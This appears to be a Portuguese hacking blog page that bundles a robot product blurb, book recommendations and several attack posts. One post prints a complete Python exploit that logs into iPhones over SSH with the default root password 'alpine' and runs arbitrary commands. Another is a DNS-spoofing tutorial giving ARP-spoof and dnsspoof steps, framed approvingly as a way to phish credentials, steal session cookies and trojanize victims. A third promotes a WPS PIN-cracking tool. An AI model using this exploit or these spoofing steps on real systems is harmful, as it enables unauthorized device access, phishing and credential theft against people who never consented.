Window Washing Robot, o Robô que Lava Janelas

 

Window-Washing-Robot

Quando o mundo estiver dominado pelos robôs, no futuro distante, os poucos sobreviventes não vão lembrar que o apocalipse começou com máquinas simples como este novo e utilíssimo robô inteligente que lava janelas!

Window Washing Robot é o primeiro robô do mundo capaz de limpar automaticamente vidros de qualquer espessura usando uma poderosa bomba de vácuo para prendê-lo no vidro e dois motores que movimentam as esteiras antiderrapantes. O robô calcula automaticamente o tamanho do vidro e a rota mais eficiente para limpá-lo (por isso é “inteligente”). Perfeito para quem mora em andares altos!

O Window Washing Robot custa US$399,99 na pré-venda da Sharper Image

Fonte:DigitalDrops

Anúncios

Exploit: IOS Remote Command Execution via ssh

Os dispositivos iOS permitem executar código remoto mediante ssh, D35m0nd142 fez um exploit demostrando esta ação.

 

Compartilho o link do 1137day e o código.

http://1337day.com/exploits/14805

#!/usr/bin/python
# When you've launched the command look the terminal
# This software work without Metasploit 
# Exploit Title: [GUI]Apple iPhone iOS Default SSH Remote Command Execution exploit
# Exploit Author: D35m0nd142
# Vendor Homepage: http://www.apple.com
# Tested on: Ubuntu 12.04 - Backtrack 5 R3 - Windows 7 Home Premium

import paramiko 
import Tkinter 
from tkMessageBox import *
import sys
import os
print "******************************************************************"
print "*Apple iPhone iOS Default SSH Remote Command Execution exploit   *"
print "*                 Created by D35m0nd142                          *"
print "******************************************************************\n" 

root=Tkinter.Tk()
root.geometry("%dx%d" % (490,220))
def exploit():
 ssh = paramiko.SSHClient()
 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
 ip_iphone=ip.get()
 ssh.connect(ip_iphone,username='root',password='alpine')
 cmd=command.get()
 stdin, stdout, stderr = ssh.exec_command(cmd)
 print stdout.readlines()
 ok=Tkinter.Label(text="Command executed",bg="blue",fg="yellow").pack() 
 ssh.close()

root['bg']="black"
root.title("Apple iOS Default SSH Remote Command Execution exploit")
message=showwarning("Warning","D35m0nd142 isn't responsable for your use of this software")
developer=Tkinter.Label(text="Developed by D35m0nd142").pack(side='bottom')
ip_label=Tkinter.Label(text="iPhone IP: ").pack()
ip=Tkinter.StringVar()
ip_entry=Tkinter.Entry(textvariable=ip).pack()
command_label=Tkinter.Label(text="Command to execute: ").pack()
command=Tkinter.StringVar()
command_entry=Tkinter.Entry(textvariable=command).pack()
launch_exploit=Tkinter.Button(text="Exploit",command=exploit).pack()
root.mainloop()

Hacking Exposed 7: Network Security Secrets & Solutions, Seventh Edition

HAcking Exposed já virou sinônimo de livros sobre segurança e qualidade. A editora responsável se preocupa em muito no mantenimento de suas edições sempre atualizadas e escritas por profissionais de peso, com bagagem técnica.

Este livro, o qual poderá ser consultado a partir do seguinte link, é recomendado para aqueles que desejam aprender um pouco mais sobre segurança da informação.

Fonte:CorujaTI

DNS Spoofing

Hoje queremos ensinar o método DNS Spoofing como uma vítima sendo enganado, a fim de conseguir encaminhá-lo para um endereço IP que nos interessa. Por que pode ser interessante? fácil:

  • Conseguir lançar um exploit contra a vítima.
  • Mostrar um site falso e pegar suas credenciais.
  • Obter o cookie de sessão da vítima.
  • Ou … todos juntos … ou seja, vamos mostrar um site falso, pegamos a senha, e nós jogamos um exploit, o que obviamente é o navegador vulnerável e troyanizamos sua máquina sem que você perceba que você enviar para o site original, de modo que você não sabe que algo está errado … O que você acha? Agora que é pura … arte!

Scenario

  • Uma vítima com o Microsoft Windows XP SP3 e usa um servidor DNS externo na rede local, como o Google DNS 8.8.8.8.
  • Um invasor com Kali Linux.
  • Agressor e vítima estão na mesma LAN. O atacante irá interceptar solicitações e respostas DNS, fornecendo o endereço IP que ele quer através da construção de um arquivo hosts especial.

Realizada pela primeira vez ataque MITM à vítima através de ARP Spoofing. Uma vez que o tráfego flui através do atacante, construímos um arquivo hosts a serem passados ​​para dnsspoof. Este arquivo especifica os endereços IP acordes para os nomes de domínio que você deseja spoof. O trecho a seguir simula o arquivo de texto editado:

 

192.168.0.57 *.tuenti.com
192.168.0.57 tuenti.com

Depois de ter criado o arquivo que você deve executar a ferramenta com a seguinte sintaxe dnsspoof

dnsspoof –i eth0 –f <fichero de hosts>.

 

Desta maneira simples você pode fazer um phishing quase perfeito, considerando que o site é um clone do original. Por outro lado, a vítima pode detectar este caso para verificar o status do seu cache considera que a resolução de nomes de domínio para Tuenti ter ficado em um endereço IP local, que surpresa e tanto para o usuário final.

Finalmente, indicam que a técnica é bastante simples e interessante. Tenha cuidado com suas máquinas de LAN como realizar este tipo de ataque é muito simples. :D :D

WPSCRACKGUI – GRAPHICAL TOOL FOR CRACKING WPS WIRELESS PIN

changelog v1.2.1 :
* The Portuguese language was added.
* Was added the Kozumi Keygen.
* Was added the Edimax Keygen.
* Was added the Belkin Keygen.
* Was added the Nisuta Keygen.
* Update Database to: # 301 Pines, # 120 MAC Address.
* Fixed bugs in General.
Graphical interface to the network cracking WPS Reaver.
wps_crack_gui1features :
  • Graphic User Interface (GUI) WPS encryption cracking.
  • Advanced Attack with Generic Dictionary.
  • Advanced Dictionary Attack with Enhanced.
  • Updated Assisted Reaver-WPS.
  • Database with PINs.
  • Change MAC Address.
  • Supported in Gt and Gtk.
  • Scan networks.
Fonte:Kembolle

HACKING WEB APPS

Wowebook é foda. Ele sempre libera bons livros para galera que gosta de estudar da forma auto ditada. Essa semana o site liberou uma excelente coletânea focada em segurança. Mas agora falaremos de um livro focado em Web Apps

HACKING WEB APPS é um livro que precisa ser lido por todos aqueles que pensam em mexer com segurança focada para aplicações Web. Ele trás uma série de exemplos e explicações que serão a sua base de conhecimento.

Veja os temas abordados em seus capítulos:

  • SQL Injection
  • Cross Site Scripting
  • Logic Attacks
  • Server Misconfigurations
  • Predictable Pages
  • Web of Distrust
  • Breaking Authentication Schemes
  • HTML5 Security Breaches
  • Attacks on Mobile Apps
  • Even if you don’t develop web sites or write HTML

Vejam que praticamente cada capítulo é um tipo de ataque. O livro poderá ser consultado a partir do seguinte link.

Boa leitura.

Fonte:CorujadeTI